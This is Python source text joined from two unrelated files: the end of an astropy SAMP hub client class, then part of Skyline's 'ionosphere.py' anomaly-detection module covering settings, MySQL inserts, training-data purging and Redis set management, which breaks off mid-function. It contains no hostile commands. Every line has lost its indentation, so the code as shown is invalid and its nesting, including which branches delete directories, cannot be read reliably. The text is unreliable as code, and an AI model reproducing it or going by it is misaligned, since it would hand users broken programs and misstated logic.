to the :meth:`~astropy.samp.hub_proxy.SAMPHubProxy.declare_subscriptions`
method.
Parameters
----------
subscriptions : dict, optional
Dictionary containing the list of MTypes to subscribe to, with the
same format of the ``subscriptions`` map passed to the
:meth:`~astropy.samp.hub_proxy.SAMPHubProxy.declare_subscriptions`
method.
"""
if self._callable:
self._declare_subscriptions(subscriptions)
else:
raise SAMPClientError("Client not callable.")
def register(self):
"""
Register the client to the SAMP Hub.
"""
if self.hub.is_connected:
if self._private_key is not None:
raise SAMPClientError("Client already registered")
result = self.hub.register(self.hub.lockfile["samp.secret"])
if result["samp.self-id"] == "":
raise SAMPClientError("Registration failed - "
"samp.self-id was not set by the hub.")
if result["samp.private-key"] == "":
raise SAMPClientError("Registration failed - "
"samp.private-key was not set by the hub.")
self._public_id = result["samp.self-id"]
self._private_key = result["samp.private-key"]
self._hub_id = result["samp.hub-id"]
if self._callable:
self._set_xmlrpc_callback()
self._declare_subscriptions()
if self._metadata != {}:
self.declare_metadata()
self._is_registered = True
else:
raise SAMPClientError("Unable to register to the SAMP Hub. "
"Hub proxy not connected.")
def unregister(self):
"""
Unregister the client from the SAMP Hub.
"""
if self.hub.is_connected:
self._is_registered = False
self.hub.unregister(self._private_key)
self._hub_id = None
self._public_id = None
self._private_key = None
else:
raise SAMPClientError("Unable to unregister from the SAMP Hub. "
"Hub proxy not connected.")
def _set_xmlrpc_callback(self):
if self.hub.is_connected and self._private_key is not None:
self.hub.set_xmlrpc_callback(self._private_key,
self._xmlrpcAddr)
def _declare_subscriptions(self, subscriptions=None):
if self.hub.is_connected and self._private_key is not None:
mtypes_dict = {}
# Collect notification mtypes and metadata
for mtype in self._notification_bindings.keys():
mtypes_dict[mtype] = copy.deepcopy(self._notification_bindings[mtype][1])
# Collect notification mtypes and metadata
for mtype in self._call_bindings.keys():
mtypes_dict[mtype] = copy.deepcopy(self._call_bindings[mtype][1])
# Add optional subscription map
if subscriptions:
mtypes_dict.update(copy.deepcopy(subscriptions))
self.hub.declare_subscriptions(self._private_key, mtypes_dict)
else:
raise SAMPClientError("Unable to declare subscriptions. Hub "
"unreachable or not connected or client "
"not registered.")
def declare_metadata(self, metadata=None):
"""
Declare the client application metadata supported.
Parameters
----------
metadata : dict, optional
Dictionary containing the client application metadata as defined in
the SAMP definition document. If omitted, then no metadata are
declared.
"""
if self.hub.is_connected and self._private_key is not None:
if metadata is not None:
self._metadata.update(metadata)
self.hub.declare_metadata(self._private_key, self._metadata)
else:
raise SAMPClientError("Unable to declare metadata. Hub "
"unreachable or not connected or client "
"not registered.")
def get_private_key(self):
"""
Return the client private key used for the Standard Profile
communications obtained at registration time (``samp.private-key``).
Returns
-------
key : str
Client private key.
"""
return self._private_key
def get_public_id(self):
"""
Return public client ID obtained at registration time
(``samp.self-id``).
Returns
-------
id : str
Client public ID.
"""
return self._public_id
|
ionosphere.py
|
from __future__ import division
import logging
import os
from os import kill, getpid, listdir
from os.path import join, isfile
from sys import version_info
# @modified 20191115 - Branch #3262: py3
# try:
# from Queue import Empty
# except:
# from queue import Empty
from time import time, sleep
from threading import Thread
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets in place of Manager().list to reduce memory and number of
# processes
# from multiprocessing import Process, Manager
from multiprocessing import Process
import re
from shutil import rmtree
# @added 20200813 - Feature #3670: IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
from shutil import move as shutil_move
# import csv
from ast import literal_eval
from datetime import datetime
# from redis import StrictRedis
import traceback
import mysql.connector
# from mysql.connector import errorcode
from sqlalchemy.sql import select
# @added 20180715 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
from sqlalchemy.sql import desc
# @added 20161213 - Branch #1790: test_tsfresh
# To match the new order introduced via the test_tsfresh method
import numpy as np
# import pandas as pd
# @added 20170107 - Feature #1852: Ionosphere - features_profile matched graphite graphs
# Feature #1844: ionosphere_matched DB table
from tsfresh import __version__ as tsfresh_version
# @added 20170809 - Task #2132: Optimise Ionosphere DB usage
from pymemcache.client.base import Client as pymemcache_Client
# @added 20180617 - Feature #2404: Ionosphere - fluid approximation
import pandas as pd
from tsfresh.feature_extraction import (
# @modified 20210101 - Task #3928: Update Skyline to use new tsfresh feature extraction method
# extract_features, ReasonableFeatureExtractionSettings)
extract_features, EfficientFCParameters)
import settings
from skyline_functions import (
fail_check, mysql_select, write_data_to_file, send_graphite_metric,
# @added 20170825 - Task #2132: Optimise Ionosphere DB usage
# @modified 20190408 - Feature #2484: FULL_DURATION feature profiles
# Moved to common_functions
# get_memcache_metric_object)
mkdir_p,
# @added 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# Added a single functions to deal with Redis connection and the
# charset='utf-8', decode_responses=True arguments required in py3
get_redis_conn, get_redis_conn_decoded,
# @added 20200714 - Bug #3644: Do not apply ionosphere_busy to batch processing metrics
# Feature #3480: batch_processing
is_batch_metric)
# @added 20161221 - calculate features for every anomaly, instead of making the
# user do it in the frontend or calling the webapp constantly in a cron like
# manner. Decouple Ionosphere from the webapp.
from features_profile import calculate_features_profile
# @modified 20170107 - Feature #1844: ionosphere_matched DB table
# Added ionosphere_matched_meta
from database import (
get_engine, ionosphere_table_meta,
# @added 20170825 - Task #2132: Optimise Ionosphere DB usage
# @modified 20190408 - Feature #2484: FULL_DURATION feature profiles
# Moved to common_functions
# metrics_table_meta,
ionosphere_matched_table_meta,
# @added 20200516 - Bug #3546: Change ionosphere_enabled if all features profiles are disabled
# Readded metrics_table to set ionosphere_enabled to 0 if a metric has no
# fps enabled and has been willy nillied
metrics_table_meta)
from tsfresh_feature_names import TSFRESH_FEATURES
# @added 20170114 - Feature #1854: Ionosphere learn
# @modified 20170117 - Feature #1854: Ionosphere learn - generations
# Renamed the function from simple learn to the meme it has become
# from learn import learn
from learn import ionosphere_learn
# @added 20170306 - Feature #1960: ionosphere_layers
from layers import run_layer_algorithms
# @added 20190322 - Feature #2484: FULL_DURATION feature profiles
from common_functions import (
get_metrics_db_object, get_calculated_features)
# @added 20190327 - Feature #2484
from echo import ionosphere_echo
skyline_app = 'ionosphere'
skyline_app_logger = '%sLog' % skyline_app
logger = logging.getLogger(skyline_app_logger)
skyline_app_logfile = '%s/%s.log' % (settings.LOG_PATH, skyline_app)
skyline_app_loglock = '%s.lock' % skyline_app_logfile
skyline_app_logwait = '%s.wait' % skyline_app_logfile
python_version = int(version_info[0])
this_host = str(os.uname()[1])
# Converting one settings variable into a local variable, just because it is a
# long string otherwise.
try:
ENABLE_IONOSPHERE_DEBUG = settings.ENABLE_IONOSPHERE_DEBUG
except:
logger.error('error :: cannot determine ENABLE_IONOSPHERE_DEBUG from settings')
ENABLE_IONOSPHERE_DEBUG = False
try:
SERVER_METRIC_PATH = '.%s' % settings.SERVER_METRICS_NAME
if SERVER_METRIC_PATH == '.':
SERVER_METRIC_PATH = ''
except:
SERVER_METRIC_PATH = ''
# @added 20180819 - Task #2526: Hard code IONOSPHERE_PROCESSES to 1
# Number of processes to assign to Ionosphere, however Ionosphere should never
# need more than 1 and is effectively hard coded as such currently. This
# variable is only declared for the purpose of maintaining a standard set up in
# each module and to possibly enable more than one processor on Ionosphere in
# the future, should there be a requirement for Ionosphere to analyse the
# metrics quicker. Running Ionosphere with more than one process is untested
# and currently it is hard coded to be 1
# (https://github.com/earthgecko/skyline/issues/69)
try:
IONOSPHERE_PROCESSES = settings.IONOSPHERE_PROCESSES
if IONOSPHERE_PROCESSES != 1:
IONOSPHERE_PROCESSES = 1
except:
IONOSPHERE_PROCESSES = 1
# @added 20190524 - Bug #3050: Ionosphere - Skyline and Graphite feedback
# Do not run checks if namespace has matched multiple times in the
# last 10 minutes. However determining which Skyline related metrics
# are feeding back are quite difficult to ascetain. So use the
# ionosphere_busy logic again and use or find the skyline host namespace
# and if busy do not analyse the Skyline host namespace while
# ionosphere is busy.
try:
# @modified 20200606 - Bug #3572: Apply list to settings import
SKYLINE_FEEDBACK_NAMESPACES = list(settings.SKYLINE_FEEDBACK_NAMESPACES)
except:
# Let us take a guess
try:
graphite_host = str(settings.GRAPHITE_HOST)
graphite_hostname = graphite_host.split('.', -1)[0]
SKYLINE_FEEDBACK_NAMESPACES = [settings.SERVER_METRICS_NAME, graphite_hostname]
except:
SKYLINE_FEEDBACK_NAMESPACES = [this_host]
# @added 20200330 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
try:
IONOSPHERE_MANAGE_PURGE = settings.IONOSPHERE_MANAGE_PURGE
except:
IONOSPHERE_MANAGE_PURGE = True
# @added 20200413 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
try:
from settings import BATCH_PROCESSING
except:
BATCH_PROCESSING = None
try:
# @modified 20200606 - Bug #3572: Apply list to settings import
# from settings import BATCH_PROCESSING_NAMESPACES
BATCH_PROCESSING_NAMESPACES = list(settings.BATCH_PROCESSING_NAMESPACES)
except:
BATCH_PROCESSING_NAMESPACES = []
# @added 20200813 - Feature #3670: IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
try:
IONOSPHERE_HISTORICAL_DATA_FOLDER = settings.IONOSPHERE_HISTORICAL_DATA_FOLDER
except:
IONOSPHERE_HISTORICAL_DATA_FOLDER = '/opt/skyline/ionosphere/historical_data'
try:
IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR = settings.IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
except:
IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR = []
skyline_app_graphite_namespace = 'skyline.%s%s' % (skyline_app, SERVER_METRIC_PATH)
max_age_seconds = settings.IONOSPHERE_CHECK_MAX_AGE
# Database configuration
config = {'user': settings.PANORAMA_DBUSER,
'password': settings.PANORAMA_DBUSERPASS,
'host': settings.PANORAMA_DBHOST,
'port': settings.PANORAMA_DBPORT,
'database': settings.PANORAMA_DATABASE,
'raise_on_warnings': True}
failed_checks_dir = '%s_failed' % settings.IONOSPHERE_CHECK_PATH
last_purge_key = '%s.last_purge_ts' % skyline_app
LOCAL_DEBUG = False
class Ionosphere(Thread):
"""
The Ionosphere class which controls the ionosphere thread and spawned
processes.
"""
def __init__(self, parent_pid):
"""
Initialize Ionosphere
Define Redis, mysql and memcached connections
"""
super(Ionosphere, self).__init__()
# @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# Use get_redis_conn and get_redis_conn_decoded
# if settings.REDIS_PASSWORD:
# self.redis_conn = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH)
# else:
# self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
# @added 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# Added a single functions to deal with Redis connection and the
# charset='utf-8', decode_responses=True arguments required in py3
self.redis_conn = get_redis_conn(skyline_app)
self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
self.daemon = True
self.parent_pid = parent_pid
self.current_pid = getpid()
self.mysql_conn = mysql.connector.connect(**config)
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Task #3032: Debug number of Python processes and memory use
# Branch #3002: docker
# Reduce amount of Manager instances that are used as each requires a
# copy of entire memory to be copied into each subprocess so this
# results in a python process per Manager instance, using as much
# memory as the parent. OK on a server, not so much in a container.
# Disabled all the Manager().list() below and replaced with Redis sets
# self.anomalous_metrics = Manager().list()
# self.not_anomalous = Manager().list()
# self.features_profiles_checked = Manager().list()
# self.training_metrics = Manager().list()
# self.sent_to_panorama = Manager().list()
# @added 20170108 - Feature #1830: Ionosphere alerts
# Added lists of ionosphere_smtp_alerter_metrics and
# ionosphere_non_smtp_alerter_metrics
# self.ionosphere_smtp_alerter_metrics = Manager().list()
# self.ionosphere_non_smtp_alerter_metrics = Manager().list()
# @added 20170306 - Feature #1960: ionosphere_layers
# self.layers_checked = Manager().list()
# @added 20170809 - Task #2132: Optimise Ionosphere DB usage
if settings.MEMCACHE_ENABLED:
self.memcache_client = pymemcache_Client((settings.MEMCACHED_SERVER_IP, settings.MEMCACHED_SERVER_PORT), connect_timeout=0.1, timeout=0.2)
else:
self.memcache_client = None
def check_if_parent_is_alive(self):
"""
Self explanatory
"""
try:
kill(self.current_pid, 0)
kill(self.parent_pid, 0)
except:
# @added 20201203 - Bug #3856: Handle boring sparsely populated metrics in derivative_metrics
# Log warning
logger.warn('warning :: parent or current process dead')
exit(0)
"""
These are the ionosphere mysql functions used to surface and input
ionosphere data for timeseries.
"""
def mysql_insert(self, insert):
"""
Insert data into mysql table
:param insert: the insert string
:type insert: str
:return: int
:rtype: int or boolean
- **Example usage**::
query = 'insert into host (host) VALUES (\'this_host\')'
result = self.mysql_insert(query)
.. note::
- If the MySQL query fails a boolean will be returned not a tuple
* ``False``
* ``None``
"""
try:
cnx = mysql.connector.connect(**config)
if ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: connected to mysql')
except mysql.connector.Error as err:
logger.error('error :: mysql error - %s' % str(err))
logger.error('error :: failed to connect to mysql')
raise
if cnx:
try:
cursor = cnx.cursor()
cursor.execute(insert)
inserted_id = cursor.lastrowid
# Make sure data is committed to the database
cnx.commit()
cursor.close()
cnx.close()
return inserted_id
except mysql.connector.Error as err:
logger.error('error :: mysql error - %s' % str(err))
logger.error('Failed to insert record')
cnx.close()
raise
else:
cnx.close()
return False
return False
def purge_old_data_dirs(self, dir_path, older_than):
time_now = time()
# @added 20200731 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Still manage ionsphere.training_data
if IONOSPHERE_MANAGE_PURGE:
logger.info('Cleaning old training data from %s older than %s seconds' % (
dir_path, str(older_than)))
else:
logger.info('IONOSPHERE_MANAGE_PURGE set to False managing ionosphere.training_data only, not purging')
# @added 20200409 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
# If training_data is not purged and contains the correct training_data
# files, add it to the list to be added to the Redis set
training_data_list = []
# @added 20200625 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
# Added occassional logging for monitoring
last_log_time = int(time_now)
try:
for path, folders, files in os.walk(dir_path):
for folder in folders[:]:
# @added 20200625 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
# Added occassional logging for monitoring
current_time = int(time())
last_logged = current_time - last_log_time
if last_logged > 29:
# @modified 20200731 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Still manage ionsphere.training_data
if IONOSPHERE_MANAGE_PURGE:
logger.info('still purging')
else:
logger.info('still managing ionosphere.training_data')
last_log_time = current_time
# @added 20200626 - Feature #3472: ionosphere.training_data Redis set
# Report app up to stop other apps not finding the
# ionosphere key in Redis
try:
self.redis_conn.setex(skyline_app, 120, current_time)
logger.info('updated Redis key for %s up' % skyline_app)
except:
logger.error('error :: failed to update Redis key for %s up' % skyline_app)
folder_path = os.path.join(path, folder)
# Only timestamped directories are removed
if re.match('\d{10}', folder):
if ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: matched - %s' % folder_path)
# @modified 20200731 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Still manage ionosphere.training_data
if IONOSPHERE_MANAGE_PURGE:
if (time_now - os.path.getmtime(folder_path)) > older_than:
# @added 20200813 - Feature #3670: IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
if IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR:
for rpath, rfolders, rfiles in os.walk(folder_path):
for rfolder in rfolders[:]:
current_folder = os.path.join(rpath, rfolder)
for rrpath, rrfolders, rrfiles in os.walk(current_folder):
move_files = False
training_files_dirs = []
if len(rrfiles) > 0:
for rfile in rrfiles:
for include_namespace in IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR:
if include_namespace in rfile:
move_files = True
if move_files:
training_files_dirs.append(rrpath)
if training_files_dirs:
try:
dest_path = rrpath.replace(dir_path, IONOSPHERE_HISTORICAL_DATA_FOLDER)
if not os.path.exists(dest_path):
mkdir_p(dest_path)
training_files = []
for training_files_dir in training_files_dirs:
training_files = os.listdir(training_files_dir)
for f in training_files:
src_file = '%s/%s' % (training_files_dir, f)
dest_file = '%s/%s' % (dest_path, f)
shutil_move(src_file, dest_file)
files_moved = True
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to move files from %s to %s' % (current_folder, IONOSPHERE_HISTORICAL_DATA_FOLDER))
files_moved = False
if files_moved:
try:
rmtree(rrpath)
logger.info('removed - %s as files were moved to %s' % (rrpath, dest_path))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to rmtree %s' % rrpath)
try:
rmtree(folder_path)
logger.info('removed - %s' % folder_path)
except:
logger.error('error :: failed to rmtree %s' % folder_path)
# @added 20200409 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
else:
if settings.IONOSPHERE_DATA_FOLDER in folder_path:
training_data_list.append(folder_path)
# @added 20200731 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Still manage ionosphere.training_data
else:
if settings.IONOSPHERE_DATA_FOLDER in folder_path:
training_data_list.append(folder_path)
except:
logger.info(traceback.format_exc())
logger.error('error :: purge_old_data_dirs - os.walk')
# @added 20200529 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
# @modified 20200731 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Still manage ionosphere.training_data
if IONOSPHERE_MANAGE_PURGE:
logger.info('cleaned old training data')
# @added 20200813 - Feature #3670: IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
# Declare training_data_instances even if no training_data_list exists
# as it can be appended to by the historical training data
training_data_instances = []
# @added 20200409 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
if training_data_list:
training_data_instances = []
for training_data_dir in training_data_list:
# @added 20200625 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
# Added occassional logging for monitoring
current_time = int(time())
last_logged = current_time - last_log_time
if last_logged > 29:
logger.info('still creating training_data Redis set')
last_log_time = current_time
# @added 20200626 - Feature #3472: ionosphere.training_data Redis set
# Report app up to stop other apps not finding the
# ionosphere key in Redis
try:
self.redis_conn.setex(skyline_app, 120, current_time)
logger.info('updated Redis key for %s up' % skyline_app)
except:
logger.error('error :: failed to update Redis key for %s up' % skyline_app)
for path, folders, files in os.walk(training_data_dir):
# @modified 20200529 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
# Wrapped in try and except
try:
add_folder = False
metric = None
timestamp = None
if files:
add_folder = False
metric = None
timestamp = None
# @added 20200815 - Feature #3670: IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
# Declared these first for all
metric_file = None
metric_file_path = None
if '/learn/' in path:
# @modified 20200815 - Feature #3670: IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
# metric_file = None
# metric_file_path = None
continue
for ifile in files:
if ifile.endswith('.png'):
add_folder = True
if ifile.endswith('.txt'):
if ifile.endswith('.fp.details.txt'):
continue
if ifile.endswith('.fp.created.txt'):
continue
else:
metric_file = ifile
metric_file_path = path
if add_folder:
if metric_file and metric_file_path:
metric = metric_file.replace('.txt', '', 1)
path_elements = metric_file_path.split(os.sep)
for element in path_elements:
if re.match('\d{10}', element):
timestamp = int(element)
if metric and timestamp:
# @added 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Determine and add resolution
resolution_seconds = settings.FULL_DURATION
for ifile in files:
if ifile.endswith('.png') and 'mirage' in ifile and 'graphite' in ifile:
try:
ifile_resolution_elements = ifile.replace('.png', '', 1).split('.')
ifile_resolution_str = ifile_resolution_elements[-1]
ifile_resolution = int(ifile_resolution_str.replace('h', '', 1))
resolution_seconds = ifile_resolution * 3600
except:
pass
# @modified 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Added resolution_seconds
# training_data_instances.append([metric, timestamp])
training_data_instances.append([metric, timestamp, resolution_seconds])
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to evaluate training_dir - %s' % str(training_data_dir))
# @added 20200813 - Feature #3670: IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
# If the IONOSPHERE_HISTORICAL_DATA_FOLDER dir exist iterate it and
# and historical training data to the list.
if os.path.exists(IONOSPHERE_HISTORICAL_DATA_FOLDER) and IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR:
historical_training_data_added = 0
if training_data_instances:
training_data_count = len(training_data_instances)
logger.info('There are %s training_data instances before iterating histroical training data' % (str(training_data_count)))
current_time = int(time())
last_logged = current_time - last_log_time
if last_logged > 29:
logger.info('still creating training_data Redis set')
last_log_time = current_time
try:
self.redis_conn.setex(skyline_app, 120, current_time)
logger.info('updated Redis key for %s up' % skyline_app)
except:
logger.error('error :: failed to update Redis key for %s up' % skyline_app)
for path, folders, files in os.walk(IONOSPHERE_HISTORICAL_DATA_FOLDER):
try:
add_folder = False
metric = None
timestamp = None
historical_metric_data = False
if files:
for historical_metric_namespace in IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR:
if historical_metric_data:
continue
for ifile in files:
if historical_metric_namespace in ifile:
historical_metric_data = True
break
if historical_metric_data:
add_folder = False
metric = None
timestamp = None
if '/learn/' in path:
metric_file = None
metric_file_path = None
continue
for ifile in files:
if ifile.endswith('.png'):
add_folder = True
if ifile.endswith('.txt'):
if ifile.endswith('.fp.details.txt'):
continue
if ifile.endswith('.fp.created.txt'):
continue
else:
metric_file = ifile
metric_file_path = path
if add_folder:
if metric_file and metric_file_path:
metric = metric_file.replace('.txt', '', 1)
path_elements = metric_file_path.split(os.sep)
for element in path_elements:
if re.match('\d{10}', element):
timestamp = int(element)
if metric and timestamp:
resolution_seconds = settings.FULL_DURATION
for ifile in files:
if ifile.endswith('.png') and 'mirage' in ifile and 'graphite' in ifile:
try:
ifile_resolution_elements = ifile.replace('.png', '', 1).split('.')
ifile_resolution_str = ifile_resolution_elements[-1]
ifile_resolution = int(ifile_resolution_str.replace('h', '', 1))
resolution_seconds = ifile_resolution * 3600
except:
pass
training_data_instances.append([metric, timestamp, resolution_seconds])
historical_training_data_added += 1
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to evaluate training_dir - %s' % str(training_data_dir))
logger.info('added %s historical training data instances' % (str(historical_training_data_added)))
if training_data_instances:
training_data_count = len(training_data_instances)
redis_set = 'ionosphere.training_data.new'
logger.info('creating Redis set %s with %s training_data instances' % (redis_set, str(training_data_count)))
try:
# Delete it if it exists and was not renamed for some reason
self.redis_conn.delete(redis_set)
logger.info(
'deleted Redis set - %s' % (redis_set))
except:
pass
# @modified 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Added resolution_seconds
# for metric, timestamp in training_data_instances:
for metric, timestamp, resolution_seconds in training_data_instances:
try:
# @modified 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Added resolution_seconds
# data = [metric, int(timestamp)]
data = [metric, int(timestamp), resolution_seconds]
self.redis_conn.sadd(redis_set, str(data))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to %s Redis set' % (str(data), redis_set))
try:
# Rename works to overwrite existing key fine
# and ... https://redis.io/commands/rename
# > when this happens RENAME executes an implicit DEL operation, so if the
# > deleted key contains a very big value it may cause high latency even if RENAME
# > itself is usually a constant-time operation.
# Does not apply, not as it is not MASSIVE set
self.redis_conn.rename('ionosphere.training_data.new', 'ionosphere.training_data')
logger.info('replaced Redis ionosphere.training_data via a rename of ionosphere.training_data.new')
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed to rename ionosphere.training_data.new to ionosphere.training_data')
last_purge_ts = int(time())
try:
self.redis_conn.setex(last_purge_key, 1800, last_purge_ts)
logger.info('updated Redis key for %s' % last_purge_key)
except:
logger.error('error :: failed to update Redis key for %s' % last_purge_key)
backup_purge_ts_file = '%s/last_purge_ts.txt' % (settings.IONOSPHERE_DATA_FOLDER)
try:
write_data_to_file(skyline_app, backup_purge_ts_file, 'w', last_purge_ts)
logger.info('updated the backup_purge_ts_file with %s' % str(last_purge_ts))
except:
logger.error('error :: failed to update the backup_purge_ts_file - %s' % backup_purge_ts_file)
return
def remove_metric_check_file(self, metric_check_file):
if os.path.isfile(str(metric_check_file)):
try:
os.remove(str(metric_check_file))
logger.info('metric_check_file removed - %s' % str(metric_check_file))
except OSError:
pass
return
# @added 20161228 - Feature #1828: ionosphere - mirage Redis data features
# Branch #922: Ionosphere
# Bringing Ionosphere online - do alert on Ionosphere metrics
def manage_ionosphere_unique_metrics(self):
"""
- Create a Redis set of all Ionosphere enabled metrics.
- Manage the ionosphere.untrainable_metrics set, removing items when
they 'expire'
:param i: python process id
:return: returns True
"""
def get_an_engine():
try:
engine, log_msg, trace = get_engine(skyline_app)
return engine, log_msg, trace
except:
trace = traceback.format_exc()
logger.error('%s' % trace)
log_msg = 'error :: failed to get MySQL engine for manage_ionosphere_unique_metrics'
logger.error('%s' % log_msg)
return None, log_msg, trace
ionosphere_unique_metrics_count = 0
redis_ionosphere_unique_metrics = None
ionosphere_unique_metrics = []
try:
# ionosphere_unique_metrics = list(self.redis_conn.smembers('ionosphere.unique_metrics'))
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# redis_ionosphere_unique_metrics = self.redis_conn.smembers('ionosphere.unique_metrics')
redis_ionosphere_unique_metrics = self.redis_conn_decoded.smembers('ionosphere.unique_metrics')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere.unique_metrics from Redis')
# ionosphere_unique_metrics = []
if redis_ionosphere_unique_metrics is not None:
ionosphere_unique_metrics = list(redis_ionosphere_unique_metrics)
ionosphere_unique_metrics_count = len(ionosphere_unique_metrics)
logger.info('Redis ionosphere.unique_metrics set has %s metrics' % (str(ionosphere_unique_metrics_count)))
else:
logger.info('Redis ionosphere.unique_metrics unknown setting to []')
ionosphere_unique_metrics = []
manage_ionosphere_unique_metrics = True
manage_ionosphere_unique_metrics_key = []
try:
manage_ionosphere_unique_metrics_key = self.redis_conn.get('ionosphere.manage_ionosphere_unique_metrics')
except Exception as e:
if LOCAL_DEBUG:
logger.error('error :: could not query Redis for ionosphere.manage_ionosphere_unique_metrics key: %s' % str(e))
if manage_ionosphere_unique_metrics_key is not None:
manage_ionosphere_unique_metrics = False
logger.info('getting MySQL engine for ionosphere_enabled_metrics')
try:
engine, log_msg, trace = get_an_engine()
logger.info(log_msg)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine for ionosphere_enabled_metrics')
return False
if not engine:
logger.error('error :: MySQL engine not obtained for ionosphere_enabled_metrics')
return False
# Determine the metrics that have ionosphere_enabled
# @added 20170103 - Task #1658: Patterning Skyline Ionosphere
# TODO: We need 2 sets not just ionosphere.unique_metrics otherwise
# if a metric is switch from Analyzer to Mirage will send all
# matched anomalies to Ionosphere even if there is no features
# profile at the specified duration.
# ionosphere.analyzer.unique_metrics (at FULL_DURATION)
# ionosphere.mirage.unique_metrics (NOT at FULL_DURATION)
# @modified 20170108 - Feature #1852: Ionosphere - features_profile matched graphite graphs
# Yes those ^^ are needed, MySQL join?
ionosphere_enabled_metrics = []
ionosphere_metrics_count = 0
query_ok = False
try:
stmt = 'select metric from metrics where ionosphere_enabled=1'
connection = engine.connect()
for row in engine.execute(stmt):
metric_basename = row['metric']
metric_name = '%s%s' % (str(settings.FULL_NAMESPACE), str(metric_basename))
ionosphere_enabled_metrics.append(metric_name)
connection.close()
query_ok = True
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine ionosphere_enabled metrics from the DB to manage ionosphere.unique_metrics Redis set')
ionosphere_metrics_count = len(ionosphere_enabled_metrics)
logger.info('db has %s ionosphere_enabled metrics' % (str(ionosphere_metrics_count)))
# @added 20190528 - Branch #3002: docker
if ionosphere_metrics_count == 0:
ionosphere_enabled_metrics = ['none']
if manage_ionosphere_unique_metrics:
# Testing the query was fine and Ionosphere metrics can go to 0 if
# all were disabled
if query_ok:
manage_ionosphere_unique_metrics = True
else:
manage_ionosphere_unique_metrics = False
if manage_ionosphere_unique_metrics:
for metric_name in ionosphere_enabled_metrics:
try:
self.redis_conn.sadd('ionosphere.new_unique_metrics', metric_name)
# logger.info('added %s to ionosphere.new_unique_metrics Redis set' % metric_name)
except:
logger.error(traceback.format_exc())
logger.info('error :: failed to add %s to ionosphere.new_unique_metrics Redis set' % metric_name)
try:
self.redis_conn.setex('ionosphere.manage_ionosphere_unique_metrics', 300, time())
except:
logger.error('error :: failed to set key :: ionosphere.manage_ionosphere_unique_metrics')
try:
logger.info('replacing Redis ionosphere.unique_metrics via rename of ionosphere.new_unique_metrics')
self.redis_conn.rename('ionosphere.new_unique_metrics', 'ionosphere.unique_metrics')
manage_ionosphere_unique_metrics = False
ionosphere_unique_metrics = []
except Exception as e:
if str(e) == 'no such key':
logger.info('could not rename Redis set ionosphere.new_unique_metrics to ionosphere.unique_metrics: %s' % str(e))
else:
logger.error('error :: could not rename Redis set ionosphere.new_unique_metrics to ionosphere.unique_metrics: %s' % str(e))
try:
self.redis_conn.setex('ionosphere.manage_ionosphere_unique_metrics', 300, time())
except:
logger.error('error :: failed to set key :: ionosphere.manage_ionosphere_unique_metrics')
redis_ionosphere_unique_metrics = []
try:
# ionosphere_unique_metrics = list(self.redis_conn.smembers('ionosphere.unique_metrics'))
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# redis_ionosphere_unique_metrics = self.redis_conn.smembers('ionosphere.unique_metrics')
